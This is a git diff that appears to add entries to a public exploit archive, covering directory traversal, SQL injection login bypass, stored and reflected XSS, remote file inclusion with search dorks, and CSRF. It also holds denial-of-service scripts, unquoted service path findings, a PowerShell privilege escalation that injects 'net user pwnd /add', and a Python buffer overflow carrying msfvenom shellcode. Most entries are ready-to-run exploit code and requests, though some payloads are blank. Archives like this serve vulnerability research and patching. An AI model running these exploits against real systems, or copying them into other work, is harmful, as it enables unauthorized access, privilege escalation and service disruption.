diff --git a/exploits/hardware/webapps/48614.txt b/exploits/hardware/webapps/48614.txt new file mode 100644 index 000000000..717c037e3 --- /dev/null +++ b/exploits/hardware/webapps/48614.txt @@ -0,0 +1,28 @@ +# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal +# Date: 2018-09-29 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://powerquality.eaton.com/ +# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999 +# Version: v1.6 +# Tested on: Windows + +# CVE-2018-12031 +# https://nvd.nist.gov/vuln/detail/CVE-2018-12031 +# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + +# PoC +To exploit vulnerability, someone could use +'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' +request to get some informations from the target. + +GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host +HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) +Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/multiple/webapps/49165.txt b/exploits/multiple/webapps/49165.txt new file mode 100644 index 000000000..95aaa00d5 --- /dev/null +++ b/exploits/multiple/webapps/49165.txt @@ -0,0 +1,20 @@ +# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection +# Date: 2020–11–17 +# Exploit Author: Anurag Kumar Rawat(A1C3VENOM) +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ +# Version: 1.1 +# Tested on Parrot os(Linux) + +Attack Vector: +An attacker can gain admin panel access using malicious sql injection quiries. + +Steps to reproduce: +1. Open admin login page using following URl: +-> http://localhost/erms/admin/index.php + +2. Now put below Payload in both the fields( User ID & Password) +Payload: ' or '1'='1 + +3)Server accept this payload and attacker successfully bypassed admin panel +without any credentials \ No newline at end of file diff --git a/exploits/php/webapps/39033.py b/exploits/php/webapps/39033.py index 83c91739a..1095f0049 100755 --- a/exploits/php/webapps/39033.py +++ b/exploits/php/webapps/39033.py @@ -1,17 +1,17 @@ #!/usr/bin/env python -# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header +# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header # Date: 12/17/2015 # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs) # Vendor Homepage: https://www.joomla.org/ # Software Link: http://joomlacode.org/gf/project/joomla/frs/ -# Version: Joomla 1.5 - 3.4.5 +# Version: Joomla 1.5 - 3.4.6 # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable) # CVE : CVE-2015-8562 ''' - Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562 + Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562 PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): diff --git a/exploits/php/webapps/48700.txt b/exploits/php/webapps/48700.txt new file mode 100644 index 000000000..5c18b5607 --- /dev/null +++ b/exploits/php/webapps/48700.txt @@ -0,0 +1,54 @@ +# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting +# Date: 2020-08-20 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://pandorafms.org/ +# Software Link: https://pandorafms.org/features/free-download-monitoring-software/ +# Version: 7.0NG747 +# Tested on: Windows/Linux/ISO + +# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS + +# Description +A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in +an attacker performing malicious actions to users who open a maliciously +crafted link or third-party web page. (Workspace >> Issues >> List of +issues >> Add - Attachment) + +# PoC + +To exploit vulnerability, someone could use a POST request to +'/pandora_console/index.php' by manipulating 'filename' parameter in the +request body to impact users who open a maliciously crafted link or +third-party web page. + +POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1 +HTTP/1.1 +Host: [HOST] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) +Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------188134206132629608391758747427 +Content-Length: 524 +DNT: 1 +Connection: close +Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs +Upgrade-Insecure-Requests: 1 + +-----------------------------188134206132629608391758747427 +Content-Disposition: form-data; name="userfile"; filename="\">.png" +Content-Type: image/png + +"> +-----------------------------188134206132629608391758747427 +Content-Disposition: form-data; name="file_description" + +desc +-----------------------------188134206132629608391758747427 +Content-Disposition: form-data; name="upload" + +Upload +-----------------------------188134206132629608391758747427-- \ No newline at end of file diff --git a/exploits/php/webapps/49064.txt b/exploits/php/webapps/49064.txt new file mode 100644 index 000000000..4b948e8f8 --- /dev/null +++ b/exploits/php/webapps/49064.txt @@ -0,0 +1,316 @@ +# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities +# Exploit Author: Vulnerability-Lab +# Date: 2020-11-11 +# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended +# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended +# Version: 3.5.3 + +Document Title: +=============== +SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2265 + + +Release Date: +============= +2020-11-11 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2265 + + +Common Vulnerability Scoring System: +==================================== +7.8 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +2.000€ - 3.000€ + + +Product & Service Introduction: +=============================== +It offers numerous opportunities to present pictures quickly and easily +in articles. The unique feature of the plugin is +that you can control any parameter on the syntax call. Editor Button - +SIGE Parameters: With the button, you can set the +parameters very easy on-the-fly in an article. It is an excellent +addition to SIGE. Highlights are: parameter call, watermark +function, read IPTC data, thumbnail storage, crop function, sort by +modification date, output as a list, CSS Image Tooltip, +Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was +rewritten entirely and equipped with numerous innovations. +The absolute highlight is the turbo mode. This feature doesn't exist in +any other plugin for Joomla!. In Turbo Mode 2 text files +are created from the HTML output of the gallery and loaded in successive +runs. This feature eliminates the tedious editing +process of each image. In a test with 50 large images, the creation of a +gallery with all the extra features (save thumbnails, +watermark generation, resize original images, etc.) without turbo mode +lasted approximately 17 seconds. In turbo mode, it only +took 1 second, and the gallery on the same scale was available! For +calling the syntaxes, additionally, an Editor Button has +been programmed. It makes it very easy to choose the required syntax, +showing all the settings and parameters of the plugin. +It is a great enrichment in using the SIGE plugin. + +(Copy of the Homepage: +https://kubik-rubik.de/sige-simple-image-gallery-extended ) +(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ; +https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ; +https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ ) + + +Abstract Advisory Information: +============================== +An independent vulnerability laboratory researcher discovered multiple +web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 & +v3.5.3 pro extension for joomla. + + +Affected Product(s): +==================== +Vendor: +Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro - +Joomla Extension (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-11-10: Researcher Notification & Coordination (Security Researcher) +2020-11-11: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Open Authentication (Anonymous Privileges) + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Full Disclosure + + +Technical Details & Description: +================================ +1.1 +A file include vulnerability has been discovered in the official Simple +Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla. +The web vulnerability allows remote attackers to unauthorized upload +web-shells or malicious contents to compromise the local file-system. + +The vulnerability is located in the img parameter of the print.php file. +Remote attackers are able to upload images to the unrestricted assets +path to compromise the web-applications file-system and involved +database management system. Exploitation requires no user interaction +and only +a low privileged user account to upload images. + + +1.2 +Multiple non-persistent cross site web vulnerabilities has been +discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 & +v3.5.3 pro extension for joomla. +The vulnerability allows remote attackers to inject own malicious script +codes with non-persistent attack vector to compromise browser to +web-application requests from the client-side. + +The non-persistent cross site scripting web vulnerabilities are located +in the `name` and `title` parameters of the `print.php` file. +Remote attackers without user or guest privileges are able to make own +malicious special crafted links to compromise client-side +GET method requests. The attack vector is non-persistent and the issue +affects the client-side. + +Successful exploitation of the vulnerabilities results in session +hijacking, non-persistent phishing attacks, non-persistent +external redirects to malicious source and non-persistent client-side +manipulation of affected application modules. + + +Proof of Concept (PoC): +======================= +1.1 +The remote file include web vulnerability can be exploited by remote +attackers without privileged user account or user interaction. +For security demonstration or to reproduce the persistent cross site web +vulnerability follow the provided information and steps below to continue. + + +Dork(s): +intext:"Powered by Simple Image Gallery Extended" +intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de" + + +PoC: Exploitation +http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI +VULNERABILITY!]&name=[NAME]%20title=[TITLE] + + +1.2 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without privileged user account and with +low user interaction. +For security demonstration or to reproduce the persistent cross site web +vulnerability follow the provided information and steps below to continue. + + +Dork(s): +intext:"Powered by Simple Image Gallery Extended" +intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de" + + +PoC: Payload +"> +'> +'> + +PoC: Example +http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE] +http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT +XSS] + + +PoC: Exploitation +http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php +?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E + + +Solution - Fix & Patch: +======================= +1.1 +The remote file include vulnerability issue can be resolved by the +following steps ... + +Example : +?php +$files=array('test.gif'); +if(in_array($_GET['file'], $files)){ +include ($_GET['file']); +} +? +* If you are a server administrator, turn off allow_url_fopen from the file + +* Or do it with the ini_set command. Only for (RFI) +?php +ini_set('allow_url_fopen ', 'Off'); +? + +* We can use the strpos command to check that if the address is: // +http, the file will not be enclosed +?php +$strpos = strpos($_GET['url'],'http://'); +if(!$strpos){ +include($_GET['url']); +} +? + +* Using str_replace we can give the given address from two characters +"/", "." Let's clean up +?php +$url=$_GET['url']; +$url = str_replace("/", "", $url); +$url = str_replace(".", "", $url); +include($url); +? + + +1.2 +The client-side cross site scripting vulnerabilities can be resolved by +the following steps ... +1. Encode and escape as parse the name and title parameters +2. Filter the input for special chars and disallow them in parameters + + +Security Risk: +============== +1.1 +The securit risk of the remote file include vulnerability in the img +path of the web-application request is estimated as high. + +1.2 +The security risk of the non-persistent cross site scripting +vulnerabilities is estimated as medium. + + +Credits & Authors: +================== +h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec +Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/php/webapps/49180.txt b/exploits/php/webapps/49180.txt new file mode 100644 index 000000000..5220768ca --- /dev/null +++ b/exploits/php/webapps/49180.txt @@ -0,0 +1,32 @@ +# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery +# Exploit Author: Dipak Panchal(th3.d1p4k) +# Vendor Homepage: https://phpgurukul.com +# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel +# Version: 5 +# Tested on Windows 10 + +Attack Vector: +An attacker can craft HTML page containing POST information to have the +victim sign into an attacker's account, where the victim can add +information assuming he/she is logged into the correct account, where in +reality, the victim is signed into the attacker's account where the changes +are visible to the attacker. + +Exploit: + + + + +
+ + + + +
+ + + + +Mitigation: +Please add a csrf token to login request or make some type prompt that the +session has ended when the new login from attacker occurs. \ No newline at end of file diff --git a/exploits/php/webapps/49204.txt b/exploits/php/webapps/49204.txt new file mode 100644 index 000000000..22d469727 --- /dev/null +++ b/exploits/php/webapps/49204.txt @@ -0,0 +1,17 @@ +# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting +# Date: 04-12-2020 +# Exploit Author: Pruthvi Nekkanti +# Vendor Homepage: https://phpgurukul.com +# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ +# Version: 1.0 +# Tested on: Kali Linux + +Attack vector: +This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. + +Vulnerable Parameters: Admin Username. + +Steps-To-Reproduce: +1. Go to the Product admin panel change the admin username +2. Put this payload in admin username field:"> +3. Now go to the website and the XSS will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49208.txt b/exploits/php/webapps/49208.txt new file mode 100644 index 000000000..0a668289d --- /dev/null +++ b/exploits/php/webapps/49208.txt @@ -0,0 +1,23 @@ +# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS +# Exploit Author: Dipak Panchal(th3.d1p4k) +# Vendor Homepage: https://savsoftquiz.com +# Software Link: https://github.com/savsofts/savsoftquiz_v5 +# Version: 5 +# Tested on Windows 10 + +Attack Vector: +This vulnerability can results attacker to inject the XSS payload in User +Registration section and each time admin visits the manage user section +from admin panel, and home page too. XSS triggers and attacker can able to +steal the cookie according to the crafted payload. + +Steps to reproduce: +1. Create new account and verified it. + +2. Navigate to Edit Profile: +-> http://localhost/savsoftquiz/index.php/user/edit_user/123 + +3. Put the below Payload in Skype ID field. and submit it. +Payload: abcd + +4. You will get XSS popup. \ No newline at end of file diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt new file mode 100644 index 000000000..06ea8299c --- /dev/null +++ b/exploits/php/webapps/49209.txt @@ -0,0 +1,28 @@ +# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting +# Date: 05.09.2020 +# Author: Vincent666 ibn Winnie +# Software Link: https://www.vbulletin.com/en/features/ +# Tested on: Windows 10 +# Web Browser: Mozilla Firefox & Opera +# Google Dorks: "Powered by vBulletin® Version 5.6.3" + +Go to the "Admin CP" - click on "Styles" - click "Style Manager" - +Choose "Denim" or other theme and choose action "Add new template" and +click "Go". + +Put on the title "1" and template "1" and "Save and Reload". Now you +can catch the new URL with HTTP Live Headers or with hands. + +So..we have Url : + +https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0 + +Test it with hands and get cross site scripting. Use for tests +different browsers. I use Mozilla Firefox and Opera. + +https://localhost/admincp/template.php?templateid=1&group="">&expandset=&searchset=&searchstring=&do=edit&windowScrollTop= + +Picture: + +https://imgur.com/a/b6gH5Fn \ No newline at end of file diff --git a/exploits/windows/dos/49206.txt b/exploits/windows/dos/49206.txt new file mode 100644 index 000000000..178a59860 --- /dev/null +++ b/exploits/windows/dos/49206.txt @@ -0,0 +1,30 @@ +# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC) +# Date: 2020-05-12 +# Exploit Author: Ismael Nava +# Vendor Homepage: http://www.raimersoft.com/ +# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe +# Version: 2.13.7 x64 +# Tested on: Windows 10 Home x64 + +#STEPS +# Open the program TapinRadio +# In Settings select Preferences option +# Click in Miscellaneous and click in Set Application Proxy +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Mikon.txt" +# Paste the content in the field Username and Address and click in OK +# Click in Ok again +# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again +# End :) + + +buffer = 'K' * 20000 + +try: + file = open("Mikon.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file diff --git a/exploits/windows/dos/49207.txt b/exploits/windows/dos/49207.txt new file mode 100644 index 000000000..927ff39a9 --- /dev/null +++ b/exploits/windows/dos/49207.txt @@ -0,0 +1,29 @@ +# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC) +# Date: 2020-05-12 +# Exploit Author: Ismael Nava +# Vendor Homepage: http://www.raimersoft.com/ +# Software Link: https://www.raimersoft.com/rarmaradio.html +# Version: 2.75.5 +# Tested on: Windows 10 Home x64 +# CVE : n/a + +#STEPS +# Open the program TapinRadio +# In Edit select Settings option +# Click in Network +# Run the python exploit script, it will create a new .txt files +# Copy the content of the file "Paimon.txt" +# Paste the content in the field Username, Address and Server and click in OK +# End :) + + +buffer = 'K' * 20000 + +try: + file = open("Paimon.txt","w") + file.write(buffer) + file.close() + + print("Archive ready") +except: + print("Archive no ready") \ No newline at end of file diff --git a/exploits/windows/local/49015.txt b/exploits/windows/local/49015.txt new file mode 100644 index 000000000..32951e2e5 --- /dev/null +++ b/exploits/windows/local/49015.txt @@ -0,0 +1,32 @@ +# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path +# Discovery by: Erika Figueroa +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.realtek.com/en/ +# Tested Version: 1.0.0.55 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 8.1 x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ + +Realtek Audio Service RtkAudioService C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe Auto +# Service info: + +C:\>sc qc "RtkAudioService" +[[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: RtkAudioService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe + GRUPO_ORDEN_CARGA : PlugPlay + ETIQUETA : 0 + NOMBRE_MOSTRAR : Realtek Audio Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49158.txt b/exploits/windows/local/49158.txt new file mode 100644 index 000000000..8d2780566 --- /dev/null +++ b/exploits/windows/local/49158.txt @@ -0,0 +1,41 @@ +# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path +# Discovery by: manuel Alvarez +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.realtek.com/en/ +# Tested Version: 1.0.64.7 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i +"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i +/v """ + +Andrea RT Filters Service +AERTFilters C:\Program Files\IDT\WDM\AESTSr64.exe + Auto + +# Service info: + +C:\Users\ComoDVD>sc qc AESTFilters +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: AESTFilters + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Andrea ST Filters Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application +startup or reboot. If successful, the local user's code would execute with +the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49203.txt b/exploits/windows/local/49203.txt new file mode 100644 index 000000000..53d0928a3 --- /dev/null +++ b/exploits/windows/local/49203.txt @@ -0,0 +1,30 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: + +C:\Users\m507>sc qc "RumbleService" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: RumbleService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Rumble\rumble_win32.exe --service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Rumble Mail Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49205.txt b/exploits/windows/local/49205.txt new file mode 100644 index 000000000..69f50d3c0 --- /dev/null +++ b/exploits/windows/local/49205.txt @@ -0,0 +1,28 @@ +# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path +# Discovery by: Ismael Nava +# Discovery Date: 05-12-2020 +# Vendor Homepage: https://www.kite.com/ +# Software Links : https://www.kite.com/download/ +# Tested Version: 1.2020.1119.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ +KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto + + +C:\>sc qc "KiteService" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: KiteService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : KiteService + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49211.ps1 b/exploits/windows/local/49211.ps1 new file mode 100644 index 000000000..13589ac59 --- /dev/null +++ b/exploits/windows/local/49211.ps1 @@ -0,0 +1,32 @@ +# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) +# Date: 2020-12-03 +# Exploit Author: 1F98D +# Original Author: Matteo Malvica +# Vendor Homepage: druva.com +# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi +# Version: 6.6.3 +# Tested on: Windows 10 (x64) +# CVE: CVE-2020-5752 +# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/ +# Druva inSync exposes an RPC service which is vulnerable to a command injection attack. + +$ErrorActionPreference = "Stop" + +$cmd = "net user pwnd /add" + +$s = New-Object System.Net.Sockets.Socket( + [System.Net.Sockets.AddressFamily]::InterNetwork, + [System.Net.Sockets.SocketType]::Stream, + [System.Net.Sockets.ProtocolType]::Tcp +) +$s.Connect("127.0.0.1", 6064) + +$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") +$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") +$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); +$length = [System.BitConverter]::GetBytes($command.Length); + +$s.Send($header) +$s.Send($rpcType) +$s.Send($length) +$s.Send($command) \ No newline at end of file diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py index 7c881a738..3b65609ac 100755 --- a/exploits/windows/remote/46697.py +++ b/exploits/windows/remote/46697.py @@ -71,6 +71,8 @@ def SendString(string,ip): for char in string: target = socket(AF_INET, SOCK_DGRAM) target.sendto(characters[char],(ip,1978)) + sleep(0.5) + diff --git a/exploits/windows/remote/49210.py b/exploits/windows/remote/49210.py new file mode 100755 index 000000000..809e75ea0 --- /dev/null +++ b/exploits/windows/remote/49210.py @@ -0,0 +1,63 @@ +# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow +# Requires web service to be enabled. +# Tested on Windows 10 Pro (x64) +# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457 +# Credits: Tulpa and SICKNESS for original exploits +# Modified: @0rbz_ + +import socket,os,time,struct,argparse,sys + +parser = argparse.ArgumentParser() +parser.add_argument('--host', required=True) +args = parser.parse_args() + +host = args.host +port = 80 + +# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py + +buf = "" +buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31" +buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43" +buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19" +buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02" +buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20" +buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6" +buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f" +buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f" +buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f" +buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c" +buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2" +buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10" +buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18" +buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77" +buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40" +buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42" +buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5" + +buffer = "\x41" * 260 +buffer += struct.pack("